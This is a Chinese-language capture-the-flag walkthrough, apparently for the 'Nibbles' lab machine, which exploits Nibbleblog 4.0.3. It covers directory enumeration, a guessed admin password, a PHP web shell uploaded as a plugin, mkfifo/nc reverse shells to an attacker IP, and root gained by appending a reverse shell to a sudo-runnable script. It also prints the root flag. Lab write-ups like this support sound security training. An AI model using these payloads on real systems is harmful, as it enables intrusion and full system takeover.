日常一练

题目

解答

题目一

curl发现隐藏信息

┌──(root㉿HgTrojan)-[~]
└─# curl 10.129.196.108                                    
<b>Hello world!</b>

<!-- /nibbleblog/ directory. Nothing interesting here! -->

dirsearch爆破目录

curl README 获取信息'目录" content "可被Apache/PHP写入'

┌──(root㉿HgTrojan)-[~]
└─# curl 10.129.196.108/nibbleblog/README
====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01

Site: http://www.nibbleblog.com
Blog: http://blog.nibbleblog.com
Help & Support: http://forum.nibbleblog.com
Documentation: http://docs.nibbleblog.com

===== Social =====
* Twitter: http://twitter.com/nibbleblog
* Facebook: http://www.facebook.com/nibbleblog
* Google+: http://google.com/+nibbleblog

===== System Requirements =====
* PHP v5.2 or higher
* PHP module - DOM
* PHP module - SimpleXML
* PHP module - GD
* Directory “content” writable by Apache/PHP

Optionals requirements

尝试访问http://10.129.196.108/nibbleblog/content/，发现存在config.xml

打开config.xml，知道用户名为admin

运行cewl，尝试找到密码。

┌──(root㉿HgTrojan)-[~]
└─# cewl 10.129.113.150/nibbleblog/content/private/config.xml         
CeWL 6.1 (Max Length) Robin Wood ([email protected]) (https://digi.ninja/)
nibbleblog
NibblesYum
yumPowered
Nibbleblog
http
USUTC
Yen
auto
landscapesimpler
admin
nibbles
comnoreply
Nibbles
Yum
yum

经过几次尝试发现密码为nibbles,通过admin:nibbles进入\admin目录

在插件上传界面尝试注入php一句话木马，虽然报错但注入成功

观察报错信息和之前爆破出来的目录

Warning: imagesx() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 26

Warning: imagesy() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 27

Warning: imagecreatetruecolor(): Invalid image dimensions in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 117

Warning: imagecopyresampled() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 118

Warning: imagejpeg() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 43

Warning: imagedestroy() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 80

目录：

┌──(root㉿HgTrojan)-[~]
└─# dirsearch -u 10.129.196.108/nibbleblog/
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.16) or chardet (5.2.0)/charset_normalizer (2.0.12) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                         
 (_||| _) (/_(_|| (_| )                                                                                                  
                                                                                                                         
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/10.129.196.108-nibbleblog-_24-01-18_03-41-46.txt

Error Log: /root/.dirsearch/logs/errors-24-01-18_03-41-46.log

Target: http://10.129.196.108/nibbleblog/

[03:41:48] Starting: 
[03:42:11] 403 -  311B  - /nibbleblog/.ht_wsr.txt                          
[03:42:11] 403 -  314B  - /nibbleblog/.htaccess.bak1                       
[03:42:11] 403 -  314B  - /nibbleblog/.htaccess.orig
[03:42:11] 403 -  316B  - /nibbleblog/.htaccess.sample
[03:42:11] 403 -  314B  - /nibbleblog/.htaccess.save
[03:42:11] 403 -  312B  - /nibbleblog/.htaccess_sc
[03:42:11] 403 -  315B  - /nibbleblog/.htaccess_extra
[03:42:11] 403 -  314B  - /nibbleblog/.htaccess_orig
[03:42:11] 403 -  312B  - /nibbleblog/.htaccessBAK
[03:42:12] 403 -  312B  - /nibbleblog/.htaccessOLD
[03:42:12] 403 -  313B  - /nibbleblog/.htaccessOLD2
[03:42:12] 403 -  305B  - /nibbleblog/.html
[03:42:12] 403 -  304B  - /nibbleblog/.htm                                 
[03:42:12] 403 -  311B  - /nibbleblog/.httr-oauth
[03:42:12] 403 -  310B  - /nibbleblog/.htpasswds
[03:42:12] 403 -  314B  - /nibbleblog/.htpasswd_test                       
[03:42:20] 403 -  304B  - /nibbleblog/.php                                 
[03:42:20] 403 -  305B  - /nibbleblog/.php3                                
[03:42:41] 200 -    1KB - /nibbleblog/COPYRIGHT.txt                         
[03:42:46] 200 -   34KB - /nibbleblog/LICENSE.txt                           
[03:42:48] 200 -    5KB - /nibbleblog/README                                
[03:43:09] 301 -  327B  - /nibbleblog/admin  ->  http://10.129.196.108/nibbleblog/admin/
[03:43:11] 200 -    1KB - /nibbleblog/admin.php                             
[03:43:12] 403 -  315B  - /nibbleblog/admin/.htaccess                       
[03:43:12] 200 -    2KB - /nibbleblog/admin/?/login
[03:43:12] 200 -    2KB - /nibbleblog/admin/                                
[03:43:15] 301 -  338B  - /nibbleblog/admin/js/tinymce  ->  http://10.129.196.108/nibbleblog/admin/js/tinymce/
[03:43:15] 200 -    2KB - /nibbleblog/admin/js/tinymce/                     
[03:44:15] 301 -  329B  - /nibbleblog/content  ->  http://10.129.196.108/nibbleblog/content/
[03:44:15] 200 -    1KB - /nibbleblog/content/                              
[03:44:51] 200 -    3KB - /nibbleblog/index.php                             
[03:44:51] 200 -    3KB - /nibbleblog/index.php/login/                      
[03:44:52] 200 -   78B  - /nibbleblog/install.php                           
[03:44:58] 301 -  331B  - /nibbleblog/languages  ->  http://10.129.196.108/nibbleblog/languages/
[03:45:38] 301 -  329B  - /nibbleblog/plugins  ->  http://10.129.196.108/nibbleblog/plugins/
[03:45:38] 200 -    4KB - /nibbleblog/plugins/                              
[03:46:19] 301 -  328B  - /nibbleblog/themes  ->  http://10.129.196.108/nibbleblog/themes/
[03:46:20] 200 -    2KB - /nibbleblog/themes/                               
[03:46:24] 200 -    2KB - /nibbleblog/update.php                            
                                                                             
Task Completed    

初步猜测木马在/plugins/目录中，但/nibbleblog/ 和 /nibbleblog/content/private/ 都存在 /plugins目录
经过逐个访问发现只有content中存在db.xml
访问http://10.129.196.108/nibbleblog/content/private/plugins/，在http://10.129.196.108/nibbleblog/content/private/plugins/about/发现可疑文件：

curl发现就是我们上传的image.php木马

┌──(root㉿HgTrojan)-[~]
└─# curl http://10.129.196.108/nibbleblog/content/private/plugins/about/profile_picture.php
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)

很好，记住地址我们来构建一个反shell,修改image.php代码

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.39(你的ip) 9443 >/tmp/f"); ?>

然后上传，并且打开侦听器9443端口

┌──(kali㉿HgTrojan)-[~]
└─$ nc -lvnp 9443
listening on [any] 9443 ...

访问：http://10.129.196.108/nibbleblog/content/private/plugins/about/profile_picture.php 让服务器运行代码。
构建反shell成功：

进行几次移动，发现目标在/home/nibbler

题目二

在本机wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
LinEnum 是一个 Linux 主机本地信息自动提取的 shell 脚本，我们引入 LinEnum.sh 来执行一些自动权限升级检查。

┌──(root㉿HgTrojan)-[~]
└─# sudo python3 -m http.server 8080

在我们获取到反shell的机上：wget http://10.10.16.39:8080/LinEnum.sh chmod +x LinEnum.sh ./LinEnum.sh sudo
如果本机获得信息 “10.129.196.108 - - [18/Jan/2024 04:58:58] "GET /LinEnum.sh HTTP/1.1" 200 -” 则获取成功

等运行结束，我们在 monitor.sh 末尾附加一个反向 shell 单行代码

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.39 54321 >/tmp/f' | tee -a monitor.sh

本地运行侦听器，打开54321端口

┌──(kali㉿HgTrojan)-[~]
└─$ nc -lvnp 9443
listening on [any] 9443 ...

然后先运行LinEnum.sh再运行monitor.sh

bash LinEnum.sh
sudo /home/nibbler/personal/stuff/monitor.sh 
#切记sudo运行 monitor.sh 一定要完整地址

接下来就是等待侦听器上捕获根 shell

最后找到flag即可

┌──(root㉿HgTrojan)-[~]
└─# nc -lvnp 54321
listening on [any] 54321 ...
connect to [10.10.16.39] from (UNKNOWN) [10.129.66.35] 39668
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
root.txt
# cat root.txt
de5e5d6619862a8aa5b9b212314e0cdd